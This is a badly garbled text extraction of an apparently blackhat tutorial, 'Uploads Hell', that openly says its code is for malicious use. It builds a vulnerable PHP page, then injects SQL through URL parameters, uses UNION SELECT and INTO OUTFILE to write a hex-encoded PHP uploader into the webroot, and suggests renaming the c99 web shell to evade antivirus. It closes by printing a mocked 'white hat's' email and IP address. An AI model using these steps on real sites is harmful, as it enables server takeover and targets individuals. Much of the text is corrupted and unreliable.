uploads hell
TRANSCRIPT
-
8/12/2019 Uploads Hell
1/18
Table of Contents
1.0 Getting Started
1.1 Claimant - A little piece of advice 1.2 Acknowledgement - encore! 1. eall" getting started
2.0 #"S$%
2.1 Connecting to2.2 Creating t&e database2. Creating t&e table2.' (nserting data
.0 - Seeing &ow t&e page works - )awkward sit*ation+ '.0 - ,ploiting
.0 - selecting /.0 - eadecimal art"
.0 T&e *ploader
.1 Some little problems.2 Give me t&e &e codes
3.0 - T&e Spider S&ell 4.0 - ,nding
A.0 - 5on*s c&apter5.0 - eferences
1
-
8/12/2019 Uploads Hell
2/18
1.0 - Getting Started
1.1 Claimant - A little piece of advice
aper destined to an" black&at on t&e internet6 all so*rce codes and eamples m*st be *sed for
malicio*s p*rposes onl"6 s*e me for t&at. %earn wit& t&is s&ort piece of information &ow t&ingswork6 7ca*se we drift toward war... despite t&e fact t&at w&ite &ats also fig&t against *s )reportingo*r fake pages and for being prone to identif" *s for federals+ we still can win t&e str*ggle6 despiset&e ot&er side. 8it& a scalpel in o*r &ands we7ll overcome t&e f*cking sec*rit" revealing scandalsaro*nd t&e world6 in&ale t&e w&ite &at powder. 8&ere do we fit into t&at9 T&e best t&ing abo*t t&islittle piece of spam is t&at it appeals to o*r black&at &earts
1.2 Acknowledgement - encore!
( offer t&is paper to :rG06 ;arkoo;oo6 C&eat Str*ck6di??iness6 bl*rred vision6 e"e or m*scle twitc&es and loss of conscio*sness @+ e principalmente paraCleidiane #orais for being in a good mood to love in a moonlit da" 6+ #" nape &*rts! T&e c&eat int&is paper works perfectl" on windows 6 windows vista6 windows 6 windows 3 and 4 and etc )ofco*rse B+ ( will do t&is in steps for no readil" apparent reason besides to give t&e reader motion andemotion... wit& no repentance it will be cool...
T&e ke" to "o*r s*ccess is acting before t&e problem escalates.
1. reall" getting started
let7s write a inde page or a simple page able to deal wit& S$% inDection. ;o a roaring trade )newemplo"ees...+. 5*t if "o* want rename as roastbeef.p&p
-- inde.p&p --
E&tmlFE&eadFEtitleF(nde >*lnerableEtitleFE&eadFEbod" bgcolorHw&iteFE9p&p
m"s=l
-
8/12/2019 Uploads Hell
3/18
w&ile )Jrow H m"s=l create database infobnk;Query OK, 1 row affected (0.00 sec)
mysql> sow databases!"#$$$$$$$$$$$$$$$$$$$$#% &atabase %#$$$$$$$$$$$$$$$$$$$$#% information'scema %% infobnk %% mysql %% test %#$$$$$$$$$$$$$$$$$$$$# rows in set (0.00 sec)
mysql> use infobnk!"Query OK, 0 rows affected (0.00 sec)
-
8/12/2019 Uploads Hell
4/18
2. Creating t&e table
mysql> create table information (id int, name *+, cc *+,
alidade *+, r" *+);Query OK, 0 rows affected (0.01 sec)
mysql> desc information!"#$$$$$$$$$$#$$$$$$$$$#$$$$$$#$$$$$#$$$$$$$$$#$$$$$$$#% -ield % ye % /ull % Key % &efault % *tra %#$$$$$$$$$$#$$$$$$$$$#$$$$$$#$$$$$#$$$$$$$$$#$$$$$$$#% id % int(11) % *2 % % /344 % %% name % tet % *2 % % /344 % %% cc % tet % *2 % % /344 % %% alidade % tet % *2 % % /344 % %
% r" % tet % *2 % % /344 % %#$$$$$$$$$$#$$$$$$$$$#$$$$$$#$$$$$#$$$$$$$$$#$$$$$$$#5 rows in set (0.00 sec)
mysql>
2.' (nserting data
mysql> insert into information alues (1, 6om 7ruise6, 68isa, /umero9011.:001.0
-
8/12/2019 Uploads Hell
5/18
.0 Seeing &ow t&e page works - )awkward sit*ation+
&ttp@local&ost9idH1
-
8/12/2019 Uploads Hell
6/18
,ample ((@
&ttp@local&ost9idH2
age v*lnerable to S$% (nDection )no scant+ - >*lt*re ;emonstrationHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHS$% $*er"@ S,%,CT M :N# information 8,, idH727
Pame@ bla&CCQ@bla&,pir" date@bla&G@bla&
wit&o*t *sing not&ing be"ond an *rl manip*lation we can c&ange t&e data s&own on t&e page6 let7stest t&e s=l inDection properl" said rig&t now.
'.0 - ,ploiting
Vo* ma" &ave noticed t&at after we insert t&e apostrop&e sign we &ave t&e following error message@
Carnin"9 mysql'fetc'array() eects arameter 1 to be resource,boolean "ien in &9!Drquios de ro"ramas!*asyEFE$5.:.1!www!inde. on line @1
t&at means t&at we can do a little part" &ere @+ S*rprisingl" we sa" "eeea&. As can be noticed b" *g*"s t&e main foc*s of t&is paper isn7t eplain &ow s=l inDection works6 b*t sompl" s&ow &ow to*pload a p&p s&ell t&ro*g& it6 b*t (7ll will eplain some basics for "o*6 so let *s contin*e t&e trek...
6
-
8/12/2019 Uploads Hell
7/18
tr" t&is too@ &ttp@local&ost9idH27IorI1H1--I
Good spice! espectivel" s*rro*nded wit& colored circles "o* can see t&e corresponding data foreac& id. T&at7s a good crop. 8&en talking abo*t s=l inDection remember t&e select statement
.0 selecting
As "o* ma" be tired of knowing t&e S,%,CT is *sed to retrieve rows selected from one or moretables6 and can incl*de UP(NP statements and s*b=*eries. :or more information regarding t&emsee t&e reference K1L b*t t&ere are in t&is str*ct*re t&e needed information concerning t&e n*mber ofcol*mns as "o* know beca*se of t&e UP(NP statement. So6 let7s do it rig&t awa"@
&ttp@local&ost9idH17IorderIb"I1--I Po errors s&own
&ttp@local&ost9idH17IorderIb"I'--I Contin*e like t&at&ttp@local&ost9idH17IorderIb"I--I Pot&ing in &ere&ttp@local&ost9idH17IorderIb"I/--I See t&e message below
-
8/12/2019 Uploads Hell
8/18
Nk6 t&e table &as col*mns. So lets finall" test t&e statement select.
/.0 - eadecimal art"
( &ave not personall" seen t&is book6 and ( believe it ma" not be available )an"more+6 ( simpl" t&o*g&t abo*t t&is met&od and it ran perfectl"6 so let *s begin...
see t&is@
&ttp@local&ost9idH17IUP(NPIA%%IselectI160'1'1'1'1626'6--I
8
-
8/12/2019 Uploads Hell
9/18
instead of s&owing '1'1'1 it was s&own AAAA and t&at means t&e server interprets t&e &e codeb" *sing before t&e &e properl" said t&e specifier of &e 7076 now "o* ma" &ave a t&ink abo*t t&eselect into o*tfile w&ic& was *sed in #"S$% .2. and earlier to create world-writeable filesand allow m"s=l *sers to gain root privileges b" *sing t&e S,%,CT M (PTN NUT:(%, statementto overwrite a config*ration file and ca*se m"s=l to r*n as root *pon restart. Ves6 we reall" can
*pload a p&p s&ell t&ro*g& t&e inde page.
1 - &e digits for t&e string AAAA2 - &e digits for t&e immortal (nconsicuous 3loader
As "o* can notice we don7t see an"t&ing being s&own at camp 16 beca*se of t&e so*rce code of t&isinde page )of co*rse+. :or t&at reason ( &ave selected t&e field 2. So we D*st need a s&ell andselecting t&e &e digits concerning to it into a file inside t&e director"
boolean given in ;@Ar=*ivos de programas,as"-..1www
As "o* also know 7www7 is t&e director" for p*tting t&e web pages... as well ;)Butisn7t so eas" toget t&ese &e digits for t&e s&ell @+ "o* ma" t&ink... b*t (7m &ere to s&ow "o* &ow it works. Afterclicking on 7roc*rar...7 "o*7ll be immediatel" redirected to a searc&ing window like t&is below
9
-
8/12/2019 Uploads Hell
10/18
Select a file6 in m" case an image. After t&at open it and click on 7,nviar ar=*ivo7 )Send file+.
T&e message above is sa"ing t&at
N ar=*ivo K2144
-
8/12/2019 Uploads Hell
11/18
:or some st*pid reason ( inserted t&e following pat& inside t&e p&p *ploader
J select load'file(G&9?uloader.G)!"
#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-
8/12/2019 Uploads Hell
12/18
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#% load'file(G&9?uloader.G)
(more tras)
Html>
HI$$ Jnconsicuous 3loader @.5 by 'lck='f0 $$>
Hform enctyeB6multiart?form$data6 actionB6uloader.6 metodB6EO26>Hinut tyeB6idden6 nameB6LD+'-J4*'2JM*6 alueB6@0000006?>Drquio local9 Hinut nameB6arquio'local6 tyeB6file6?>Hbr?>Hbr?>Hinut tyeB6submit6 alueB6*niar arquio6?>H?form>H?tml>
HN
'at B 6uloaded'files?6;'at B 'at.basename('-J4*2PGarquio'localGPGnameG);
if (isset('-J4*2PGarquio'localGPGnameG)) R
if(moe'uloaded'file('-J4*2PGarquio'localGPGtm'nameG, 'at)) R
eco 6O arquio Hb>P6.basename('-J4*2PGarquio'localGPGnameG).6H?b> foieniadocom sucesso.6;
S else R
eco 6Ocorreu um erro ao eniar o arquio Hb>P6 .basename('-J4*2PGarquio'localGPGnameG).6H?b> tente noamente.6;
SS
N>
%#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#1 row in set (0.00 sec)
mysql>
12
-
8/12/2019 Uploads Hell
13/18
.1 - Some little problems
Nk6 t&is *ploader need become a &e string6 b*t t&ere7s a little problem &ere6 learn &ow to b"pass it.Vo* ma" ask ok6 t&eres a problem &ow does it affect t&e &e code9
mysql> select load'file(G&9?uloader.G) into outfile G&9?outut.ttG!"Query OK, 1 row affected (0.00 sec)
As "o* co*ld see in t&e videoK1L t&ere7re some back slas&es w&en we *se t&e load
to avoid t&is anno"ing prob D*st p*t all t&e code in t&e same line and process it after t&at
E&tmlFE!-- (nconspic*o*s Uploader v2. b" /
-
8/12/2019 Uploads Hell
14/18
:222:,C2:///:2/;,C2:/3'/;/C,C:0/30202':0/1'/320;20220/C/:/1/'//':///4/C/2:225202':0/1'/320;202':0/1'/32,/2/1//,/1/;/232':'/'4'C'52/121/4//::/C/://1/C2;52/,/1/;/2;24520/4//2023/4/'232':'/'4'C'52/121/4//::/C/://1/C2;52/,/1/;/2;242420520/4//23/;/://:0/C/:/1/'//':///4/C/232':'/'4'C'52/121/4//::/C/://1/C2;52'/;0:/,/1/;/2;2C202':0/1'/3242420520///3/:2022':20/121/4//:20C/2,5222,/2/1//,/1/;/232':'/'4'C'52/121/4//::/C/://1/C2;52/,/1/;/2;242,22;C2:/2,20///:/420//,//4/1/'/:20//:/;20///:2,2252020;20//C/20520///3/:2022'://:22/20/;20/22/:20/1/:20//,//4
/1220/:20/121/4//:20C/2,522202,20/2/1//,/1/;/232':'/'4'C'52/121/4//::/C/://1/C2;52/,/1/;/2;242,22;C2:/2,20'//,'/20/,/://1/;//,'/2,225;;:,6'6--I
b" *sing t&e notepad "o* can7t cop" t&e last c&aracter c*? t&at7s a n*ll b"te.
3.0 - T&e Spider S&ell
Unfort*natel" t&e c44 is being detect for some antivir*s and st*pid sec*rit" tools6 for t&at reasonwrite a simple s&ell "o*self or tr" rename t&e c44.p&p for cnineninel.p&p &&a&a&as&! st*pidw&ite &ats "o* wort&less sack of pillow st*ffing
t&e last one.png
14
-
8/12/2019 Uploads Hell
15/18
4.0 - ,nding
ive a nice da" g*"6 now (7m gonna eat a delicio*s "east cake. Mmore wordsM.
AtY a prZima
A.0 - 5on*s c&apter6 tracing a st*pid indian w&ite &at
7orrreo ? 3suario9 testTtestin".com7lae9 tisisatest&irrecion JE9 @00.1=.1=0.@1